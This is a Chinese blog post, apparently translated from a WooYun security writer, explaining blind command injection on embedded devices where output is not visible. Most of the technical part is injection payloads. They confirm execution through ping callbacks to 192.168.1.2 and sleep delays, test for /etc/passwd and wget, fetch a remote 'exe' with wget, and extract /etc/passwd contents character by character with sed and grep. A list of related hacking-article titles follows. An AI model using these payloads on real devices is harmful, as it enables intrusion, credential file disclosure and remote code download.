嵌入式设备中的盲注 (翻译)
杀戮 (乌云安全实验室的杂役) | 2014-12-17 16:14
作者展示的情况是当你能输入命令但是看不到回显的情况下如何确认这是个漏洞,并利用。
下面就是我自己的话翻译的。
0x00 简介
很多时候你可能能输入一些命令像ping 或者reboot,但是由于你看不到回显,所以无法确定是否存在漏洞,或者漏洞如何利用。
所以我会考虑酱紫的命令
# 如果/bin/ls存在会执行Ping ;if test -e "/bin/ls";then ping -c1 192.168.1.2;fi; # or better ;if test -e "/bin/ls";then ping -c1 192.168.1.2;else ping -c2 192.168.1.2;fi;
当回显成功我会采取一些手段来确认目标的环境
# 检测敏感文件和目录 ;if test -d "/tmp";then ping -c2 192.168.1.2;fi; ;if test -r "/var/passwd";then ping -c2 192.168.1.2;fi; ;if test -r "/etc/passwd";then ping -c2 192.168.1.2;fi; # 登陆日志是否存在? ;if test -e "/usr/bin/logger";then ping -c1 192.168.1.2;fi; # 检测wget命令是否存在 ;if test -e "/bin/wget";then ping -c1 192.168.1.2;fi; ;if test -e "/sbin/wget";then ping -c1 192.168.1.2;fi; ;if test -e "/usr/bin/wget";then ping -c1 192.168.1.2;fi; ;if test -e "/usr/sbin/wget";then ping -c1 192.168.1.2;fi;
不同的嵌入式系统都可能进行大量而且风格不同的二次开发,必须使用大量命令测试目标的可用环境。(我觉得还是写脚本跑吧)
通过不同样式的命令执行方式你甚至可以检查出对应脚本
wget -g -r exe -l exe 192.168.1.2 wget http://192.168.1.2/exe wget 192.168.1.2/exe
0x01 SQL盲注带来的Idea
我对嵌入式系统的盲注做了简单介绍,最近这种方法给了我很多灵感,其实这个很像SQL盲注
# http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
酱紫的
事实上我们可以在linux中达到同样的效果,linux中有很多很强大的工具,像sed 啊,grep啊
$ if test `sed -n '/^root/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;fi
1
// 检测root,下面是一些更好的方式。
$ if test `sed -n '/^r/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;fi
1
$ if test `sed -n '/^ro/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;fi
1
$ if test `sed -n '/^roo/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;fi
1
$ if test `sed -n '/^root/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;fi
1
通过一些字符串操作命令我们可以轻易的检测任何一个文件任何一行的内容,还可以使用sleep 等一些时间命令来达到时间盲注的效果。
0x02 技巧和窍门
1. 这些技巧是否有用跟所处的环境还有智商有着很大的关联。
2. 大多数时候wget就够用了
3. 可能有的时候会有字符限制,不能输入超过40个,这时候可以用重定向方式把命令放到一个文件再去执行
4. 成为一个正则表达式好手,善于玩弄各种奇葩的符号。
0x03 总结
我所描述的并不是什么新技术,只是现有技术的一种根据环境而变化的变种。
0x04 例子
# 检测root
if test `sed -n '/^roo:/{s/^\(.\{1\}\).*/\1/g;p}' /var/passwd`;then sleep 15;fi
# 检测ftp账户
if test `sed -n '/^ftp:/{s/^\(.\{1\}\).*/\1/g;p}' /var/passwd`;then sleep 15;fi
# 如果第二行是0开头就执行命令sleep
if test `sed -n 2p /etc/passwd|sed -n '/^0/{s/^\(.\{1\}\).*/\1/g;p}'`;then sleep 15;fi
# 如果root再第一行就ping
if test `sed -n 1p /etc/passwd|sed -n '/root/{s/^\(.\{1\}\).*/\1/g;p}'`;then ping -c1 192.168.1.2;fi
# 如果root那行的长度等于10 就执行ping
s=`cat /etc/passwd|grep root`;if test ${#s} -eq 10;then ping -c1 192.168.1.2;fi
# ping back if `pwd` is "/tmp"
if test `pwd` == "/tmp";then ping -c1 192.168.1.2;fi
# 检测linux版本
if test `sed -n '/^Linux version 2.6.30/{s/^\(.\{1\}\).*/\1/g;p}' /proc/version`;then echo 1;fi
# 一些grep实例
if test `grep root /etc/passwd|grep -o .|sed -n 1p` = "r";then echo 1; else echo 2;fi
if test `grep root /etc/passwd|grep -o ..|sed -n 1p` = "ro";then echo 1; else echo 2;fi
if test `grep root /etc/passwd|grep -o ...|sed -n 1p` = "roo";then echo 1; else echo 2;fi
相关内容:
Hack无线门铃 - 简单分析和重放攻击,信号重放,无线物理硬件黑客
【视频】黑客远程入侵汽车解锁车门,汽车电子钥匙信号重放,重放钥匙扣信号
iSniff GPS:WIFI被动嗅探工具,嗅探附近无线设备广播泄漏信息定位
全自动无线入侵热点,黑客全自动WIFI钓鱼,大规模批量无线热点钓鱼
WiFi流量劫持:网站JS脚本缓存投毒!长期控制!浏览任意页面即可中毒!
如何入侵控制交通红绿灯?美研究人员发现劫持交通灯其实非常简单
某款网络摄像机直接获取帐号密码,视频监控设备配置信息泄露漏洞
讨论电影中出现的各种骇客、黑客入侵手法,《幽灵》、《神探夏洛克》
使用WiFi真的有那么危险吗?安全科普:教你增强自己的无线网络安全
WiFi里的猫腻:变色龙病毒,无线破解、蹭网,蜜罐路由器,黑吃黑
黑客讲故事:攻下隔壁女生路由器后,我都做了些什么,无线路由器被蹭网后,入侵女神
女黑客Oona,分析直升机现场拍摄警车追捕画面中的信号声,绘出飞机飞行轨迹
指纹门控的安全,户外物理设备入侵,如何入侵绕过指纹识别安全锁、门控系统
揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息
已更新Iwork10测评!求推荐一款便携式户外物理移动渗透终端设备!!!
一基友再遇奇葩无线网络环境,顺便求二级/三级/四级ISP的盈利方式?
Hikvision IP Cameras Multiple Vulnerabilities,海康威视IP摄像机的多个漏洞
Hikvision IP Cameras Multiple Vulnerabilities, 海康威视IP摄像机的多个漏洞
已获得网络出口引擎管理员权限,试问监控全网HTTP密码传输可能性?
浅谈社工,欢迎讨论、补充,各种猥琐社工、人肉技巧,物理社工、人肉
【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工
ATM 机里装着什么?ATM 机的结构是什么?ATM 的构造原理?
关于伪基站的一些问题:信号覆盖范围?设备成本?是否违法?教程资料?
伪基站是怎么定位的呢?定位并抓捕伪基站、圈地短信、垃圾短信犯罪团伙!
讨论:通过无线路由渗透入侵内网电脑,如何从无线路由器到个人PC机?
谈谈时事:电话“诈”弹导致多地机场飞机被迫返航,论如何打电话不被追踪
小米云服务同步“wlan设置”的安全性,小米已收集了32万wifi明文密码
(视频)USRP 来Sniffing 无线键盘,27Mhz keyboard sniffing
(视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing
(视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing
全面披露华硕十款无线路由器 - AiCloud启用单位的多个漏洞
超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她
讨论如何通过航空飞机的互联网入侵、劫持飞机上的乘客,入侵劫持卫星
R820T电视棒+软件无线电跟踪飞机飞行轨迹(SDR&ADS-B)
rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹ADS-B/TCAS/SSR
rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹 ADS-B/TCAS/SSR
电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪
rtl-sdr,RTL2832电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪
视频: Dtac:将宠物变成了WiFi热点,泰国运营商将宠物变成WiFi热点
户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机)
GNU Radio USRP OpenBTS 小区短信 区域短信
一种牛逼的短信群发技术 GNU Radio 小区短信 区域短信 免费发 无法拦截
周末湖边 Sniffing ADS-B,Hack 私人小型机场
视频: ATM 的那点事! ATM 漏洞, Hack for fun! 利用磁卡导致ATM关机
Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入
android软件外加监控,隐私安全?!爆个一键root内幕!
关于X卧底的通话监听、短信记录、定位追踪等侵犯隐私的行为讨论
远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击
dSploit—Android网络渗透套件测试小记(含视频)
实时抓取移动设备上的通信包(ADVsock2pipe+Wireshark+nc+tcpdump)
武汉公安开发尖端人像识别系统 可瞬间辨认嫌疑人 全国摄像头寻人
美国极超音速飞机90分钟飞越半球,时速可达4000千米,飞行在太空边缘
单反刷成安卓/ios,手机 psp kindle,连文曲星 计算器 空调遥控器也不放过
视频:FPSRussia的俄式军火秀 遥控武装四桨直升机[中英双语字幕]
免费 WiFi 是“披着羊皮的狼”,女子蹭网引来20多名警察
Flightradar24 网站“直播”天上“堵飞机” 看全球实时航班
用音响打电话,揭秘柯南电话拨号,如果电话键失灵了,直接用音响打电话
用音响打电话,揭秘柯南电话拨号,如果电话键失灵了,直接用音响打电话
iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件人攻击器
Never trust SMS: iOS text spoofing,永远不要相信短信:iOS的文字欺骗
iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号
德安全专家破解GSM加密算法 GSM网络破解 监听全球40亿部手机
拉斯维加斯国际黑客大会(DefCon 2012黑客会议)本周开战
802.11b 无线网络固件级攻击、802.11b Firmware-Level Attacks
手机全息投影、初音、Miku、立体投影,制作方法已放出,图文+视频
从技术角度深入剖析:改号软件,电话号码任意显示,伪造来电显示
华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕
视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播
视频:漂浮在空中的水珠、静止的水滴,适合做成展品的视错觉,超炫!!
利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备
电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍?
视频:鬼佬的室内四轴定位系统,震惊,飞机模型能玩到如此地步!
ATM Skimmers - ATM Hacker - 自动提款机黑客
用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位
不要偷黑客的东西 - Why you don't steal from a hacker
【视频】发射到121000英尺(36880.8米)摄影机拍摄地球